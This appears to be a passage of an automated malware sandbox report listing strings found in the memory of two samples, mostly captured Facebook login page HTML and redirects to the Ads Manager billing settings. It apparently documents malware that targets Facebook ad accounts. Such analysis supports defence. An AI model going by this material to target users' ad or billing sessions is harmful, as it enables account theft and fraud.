Source: llpb1133.exe, 00000014.00000002.602167234.00000000004E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comP equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com\ equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comtey.com equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_h4Swrc8tiWJ sx_8ed39e"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT33nT0av14-OdCHPSBrmN7vWoi_N58qoOyFxP9hxRxhkYZWAsqrYtRQKSZkjXicDAN0rsfh_ncZ6C7b0pQeIWPfdIA5WlCAuouNjLvOMIXOLTMLxJamyk7gEFY1PtSDmz1xbLox7hwsOPFgyN5QVw" title="Check out Instagram" target="_blank" rel="nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bulletin</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn how we collect, use and share information to support Facebook.">Privacy Policy</a></li><li><a href="/privacy/center/?entry_point=facebook_page_footer" title="Learn how to manage and control your privacy on Facebook.">Privacy Center</a></li><li><a href="/groups/explore/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.meta.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></li><li><a
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ,[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487241275804713"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","g5ziY9wIl3trqyKMAcJWVuY9",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","g5ziY8MhThgrxFTRnRYf0yiq",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1871697":{r:1,s:1},"1829319":{r:1},"1829320":{r:1},"1843988":{r:1}}},hblp:{consistency:{rev:1006922962},compMap:{TransportSelectingClientSingleton:{r:["Jg4hod5","3zhsDmU","Yv2Rq7N"],rds:{m:["ContextualConfig","BladeRunnerClient","DGWRequestStreamClient","MqttLongPollingRunner","BanzaiScuba_DEPRECATED"],r:["c6kpRKc","9Zir1u8","sqCOqNp","HN4gUih","foz7nw7","msMcd10","TjYa5zM","5p9Jgd9","Ajrp3n3","CUpDMe1"]},be:1},RequestStreamCommonRequestStreamCommonTypes:{r:["Jg4hod5"],be:1}}}},allResources:["c6kpRKc","sqCOqNp","GpQFBwL","TjYa5zM","foz7nw7","CUpDMe1","msMcd10","BnbajS7","HN4gUih","Da6rL6k"]});}));</script></body></html> equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: .Rwww.facebook.com/ads/manager/account_settings/account_billingE51FFCD991E7 equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.00000000028BA000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.482623800.0000000000558000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604870150.000000000289F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing0`J equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingemRHRnNiQ0k2SUNJd0lpd2dJbTFoWXlJNklDSTVNemRtT0RVMU1EbjA9K equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 801],[30005,838801],[30006,573585],[30007,838801],[30008,838801],[30012,838801],[30013,838801],[30015,806033],[30018,806033],[30021,540823],[30022,540817],[30040,806033],[30093,806033],[30094,806033],[30095,806033],[30101,541591],[30102,541591],[30103,541591],[30104,541591],[30106,806039],[30107,806039],[38000,541427],[38001,806643]]}",fds:60,fda:60,i:60,sbs:1,dbs:100,bbs:100,hbi:60,rt:262144,hbcbc:2,hbvbc:0,hbbi:30,sid:-1,hbv:"8512997887222069599"}]],["NavigationMetrics","setPage",[],[{page:"XWebLoginController",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487022966541601"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","UJziYyYI8MDeJZgXiXCkQ3-E",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","UJziYxwlxqEat5iGTuvcAVAe",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1743095":{r:1,s:1},"1871697":{r:1,s:1},"1829319":{r:1},"1829320":{r:1},"1843988":{r:1}},gkxData:{"1652843":{result:false,hash:"AT6uh9NWRY4QEQoYoPI"}}},hblp:{consistency:{rev:1006922962},rsrcMap:{zPYlTyl:{type:"js",src:" equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: </a></li><li><a class="_sv4" dir="ltr" href="https://hi-in.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;hi_IN&quot;, &quot;en_US&quot;, &quot;https:\/\/hi-in.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 8); return false;" title="Hindi"> equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: </a></li><li><a class="_sv4" dir="ltr" href="https://zh-cn.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;zh_CN&quot;, &quot;en_US&quot;, &quot;https:\/\/zh-cn.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Simplified Chinese (China)"> equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="0UjEcK6d">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr6oI","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-U40","isCQuick":false});</script><script nonce="0UjEcK6d">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="0UjEcK6d"></style><script nonce="0UjEcK6d">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604851431.0000000002865000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="0UjEcK6d">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr6oI","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-U40","isCQuick":false});</script><script nonce="0UjEcK6d">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="0UjEcK6d"></style><script nonce="0UjEcK6d">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content="See posts, photos and more on Facebook." /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/RspwE1UYLwr.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Pud6B2Z" /> equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="I8ayIX6p">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrCKU","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-7Nc","isCQuick":false});</script><script nonce="I8ayIX6p">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="I8ayIX6p"></style><script nonce="I8ayIX6p">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2FaK equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="I8ayIX6p">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrCKU","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-7Nc","isCQuick":false});</script><script nonce="I8ayIX6p">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="I8ayIX6p"></style><script nonce="I8ayIX6p">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2FaK equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="I8ayIX6p">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrCKU","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-7Nc","isCQuick":false});</script><script nonce="I8ayIX6p">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="I8ayIX6p"></style><script nonce="I8ayIX6p">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="h_0_0_DM",{"__html":"Bahasa Indonesia"},1],["__markup_3310c079_0_1_eM",{"__html":"Dansk"},1],["__markup_3310c079_0_2_2L",{"__html":"Deutsch"},1],["__markup_3310c079_0_3_ft",{"__html":"English (UK)"},1],["__markup_3310c079_0_4_y0",{"__html":"English (US)"},1],["__markup_3310c079_0_5_l6",{"__html":"Espa\u00f1ol"},1],["__markup_3310c079_0_6_tR",{"__html":"Espa\u00f1ol (Espa\u00f1a)"},1],["__markup_3310c079_0_7_Y1",{"__html":"Fran\u00e7ais (France)"},1],["__markup_3310c079_0_8_5+",{"__html":"Italiano"},1],["__markup_3310c079_0_9_eb",{"__html":"Magyar"},1],["__markup_3310c079_0_a_5j",{"__ht equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="I8ayIX6p">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrCKU","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-7Nc","isCQuick":false});</script><script nonce="I8ayIX6p">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="I8ayIX6p"></style><script nonce="I8ayIX6p">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content="See posts, photos and more on Facebook." /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rs equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="I8ayIX6p">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrCKU","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-7Nc","isCQuick":false});</script><script nonce="I8ayIX6p">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="I8ayIX6p"></style><script nonce="I8ayIX6p">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content="See posts, photos and more on Facebook." /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsoJ equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="I8ayIX6p">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrCKU","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-7Nc","isCQuick":false});</script><script nonce="I8ayIX6p">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="I8ayIX6p"></style><script nonce="I8ayIX6p">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content="See posts, photos and more on Facebook." /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/RspwE1UYLwr.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Pud6B2Z" /> equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.00000000028BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="btvDfB12">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrsdc","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-Erw","isCQuick":false});</script><script nonce="btvDfB12">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="btvDfB12"></style><script nonce="btvDfB12">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2FaB862DED} equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.00000000028BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="btvDfB12">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrsdc","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-Erw","isCQuick":false});</script><script nonce="btvDfB12">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="btvDfB12"></style><script nonce="btvDfB12">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2FaB862DED}tqX5tk11V/C3f@ equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605696603.0000000002916000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="btvDfB12">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrsdc","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-Erw","isCQuick":false});</script><script nonce="btvDfB12">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="btvDfB12"></style><script nonce="btvDfB12">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</titl equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="btvDfB12">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrsdc","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-Erw","isCQuick":false});</script><script nonce="btvDfB12">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="btvDfB12"></style><script nonce="btvDfB12">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https:/ equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="btvDfB12">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrsdc","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-Erw","isCQuick":false});</script><script nonce="btvDfB12">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="btvDfB12"></style><script nonce="btvDfB12">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content=" equals www.facebook.com (Facebook)
